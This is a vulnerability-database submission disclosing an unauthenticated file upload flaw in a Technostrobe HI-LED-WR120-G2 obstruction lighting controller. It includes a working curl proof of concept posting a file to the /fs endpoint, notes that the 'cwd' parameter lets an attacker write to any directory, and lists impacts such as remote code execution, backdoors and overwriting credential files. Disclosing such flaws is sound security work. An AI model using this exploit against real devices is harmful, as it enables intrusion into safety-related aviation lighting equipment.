Submit #783326: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Unrestricted File Uploadinfo

TitleTechnostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Unrestricted File Upload
DescriptionThe device exposes an unauthenticated file upload endpoint: POST /fs HTTP/1.1 Host: <target> The Proof of Concept curl --http0.9 'http://technostrobe.shiky.demo:58746/fs' \ -X POST \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0)' \ -H 'Origin: http://technostrobe.shiky.demo:58746' \ -H 'Referer: http://technostrobe.shiky.demo:58746/Config/index_config.html' \ -F "cwd=/http/Technostrobe" \ -F "[email protected];type=text/x-python" \ -F "iehack=" \ -F "submit=Upload" Verify the upload worked: GET http://technostrobe.shiky.demo:58746/Technostrobe/test.txt → returns file contents ✅ No credentials. No session. One cURL command. File is on the device and web-accessible. Request Parameters — All Attacker-Controlled POST /fs Content-Type: multipart/form-data ┌─────────────────┬────────────────────────────────────────────────┐ │ Parameter │ Value / Notes │ ├─────────────────┼────────────────────────────────────────────────┤ │ cwd │ /http/Technostrobe ← ATTACKER CONTROLLED │ │ │ (destination directory — no restriction) │ ├─────────────────┼────────────────────────────────────────────────┤ │ selectedfile │ @payload.sh ← ANY FILE TYPE │ │ │ (no extension or MIME validation) │ ├─────────────────┼────────────────────────────────────────────────┤ │ iehack │ (empty) — legacy IE compatibility field │ ├─────────────────┼────────────────────────────────────────────────┤ │ submit │ Upload — action trigger │ └─────────────────┴────────────────────────────────────────────────┘ The cwd parameter is the most dangerous. Changing it targets any other directory on the filesystem: The file is stored on the device without validation. Root Cause: Missing authentication checks No file validation No path restrictions Impact: Arbitrary file upload Possible remote code execution Persistent backdoor deployment Config files (.cfg) ->Overwrite credentials, settings -> Backdoor admin access
Source⚠️ https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-05-FileUpload.md
User
 shiky8 (UID 96565)
Submission03/20/2026 01:28 (18 days ago)
Moderation04/04/2026 16:41 (16 days later)
StatusAccepted
VulDB entry355343 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 /fs cwd unrestricted upload]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!